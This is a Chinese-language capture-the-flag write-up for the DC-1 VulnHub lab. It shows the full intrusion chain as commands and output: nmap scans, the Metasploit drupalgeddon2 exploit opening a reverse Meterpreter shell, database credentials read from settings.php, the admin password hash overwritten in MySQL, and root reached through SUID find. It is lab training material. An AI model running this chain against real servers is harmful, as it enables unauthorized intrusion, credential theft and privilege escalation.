DCchallenges1

安装

下载解压后使用Vmware打开ova文件，选择桥接模式，同时也将kali设置为桥接模式

环境

网段 192.168.18.0/24

kali 192.168.18.131

靶机 192.168.18.130

扫描网段

sudo nmap -sn 192.168.18.0/24

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-27 21:30 CST Nmap scan report for 192.168.18.2 Host is up (0.00015s latency). MAC Address: 00:50:56:E0:DA:9A (VMware) Nmap scan report for 192.168.18.130 Host is up (0.00018s latency). MAC Address: 00:0C:29:F4:40:B8 (VMware) Nmap scan report for 192.168.18.254 Host is up (0.00036s latency). MAC Address: 00:50:56:F1:CD:81 (VMware) Nmap scan report for 192.168.18.131 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.16 seconds

扫描靶机开放的端口

sudo nmap -sS 192.168.18.130

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-27 21:31 CST Nmap scan report for 192.168.18.130 Host is up (0.000079s latency). Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind MAC Address: 00:0C:29:F4:40:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

注：sS ：半开放扫描（非3次握手的tcp扫描）比较安全，不会产生会话，几乎不会产生日志，工作中常用，建议大家不要直接全上的去扫，稳妥更稳妥，需要有root权限

发现开放了80端口，就用浏览器去访问一下192.168.18.130:80 根据网站页面显示信息可以判断是Drupal的CMS

用dirsearch扫一下看看有什么

python3 dirsearch.py -u 192.168.18.130:80

用dirb 扫一下试试

dirb http://192.168.18.130

没找到啥有用的信息，看下robots.txt

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

没什么有用的信息

msfconsole

msf6 > search drupal
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2 


msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options 
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.18.130
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options 
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit 
[*] Started reverse TCP handler on 192.168.18.131:4444 
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.18.130
[*] Meterpreter session 1 opened (192.168.18.131:4444 -> 192.168.18.130:43581) at 2021-04-28 20:26:27 +0800
meterpreter > getuid
Server username: www-data (33)
meterpreter > pwd
/var/www
meterpreter > ls
Listing: /var/www
meterpreter > shell
Process 4653 created.
Channel 3 created.

flag1

cd /var/www
cat falg1.txt
Every good CMS needs a config file - and so do you.

flag4


cat /etc/passwd
发现下面有个falg4  flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
cd /home/flag4
ls
flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

flag2

查看网站配置 看有什么有用信息
cd /var/www/site/default
ls
default.settings.php
files
settings.php

cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */
 
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

... ...

用python反弹个交互式shell python -c "import pty;pty.spawn('/bin/bash')"

flag3

顺便得到了数据库信息，登录数据库看看

www-data@DC-1:/var/www/sites/default$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 418639
Server version: 5.5.60-0+deb7u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)

mysql> use drupaldb
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables from drupaldb;
  ... ...
mysql> select * from users;


| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |




drupal密码的加密是破解不出来，需要重置管理的密码(加密脚本位置在网站根目录下的scripts/password-hash.sh)
php scripts/password-hash.sh admin  (admin是你要设置的新密码)

www-data@DC-1:/var/www$ php scripts/password-hash.sh admin
php scripts/password-hash.sh admin

password: admin                 hash: $S$DiOAa4l0lQWNrQKTEfwN1erRW769BkBafRIkfVBFRS79BIWF.Vtb



去数据库修改密码
mysql> update users set pass ="$S$DiOAa4l0lQWNrQKTEfwN1erRW769BkBafRIkfVBFRS79BIWF.Vtb" where name="admin";
<N1erRW769BkBafRIkfVBFRS79BIWF.Vtb" where name="admin";                      
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0

重置完密码后登录网站 (admin admin)

但是发现当前权限不够

1 2	whoami www-data

flag5

使用find提权

www-data@DC-1:/var/www$ touch dctest        
touch dctest
www-data@DC-1:/var/www$ find dctest -exec whoami \;
find dctest -exec whoami \;
root
www-data@DC-1:/var/www$ whoami
whoami
www-data
www-data@DC-1:/var/www$ find dctest -exec ls /root \;
find dctest -exec ls /root \;
thefinalflag.txt
www-data@DC-1:/var/www$ find dctest -exec cat /root/thefinalflag.txt \;
find dctest -exec cat /root/thefinalflag.txt \;
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
www-data@DC-1:/var/www$

Reference

https://www.freebuf.com/articles/web/260236.html

https://blog.csdn.net/wang_624/article/details/90509951

https://f5.pm/go-53516.html

https://www.freebuf.com/articles/network/218073.html

https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC1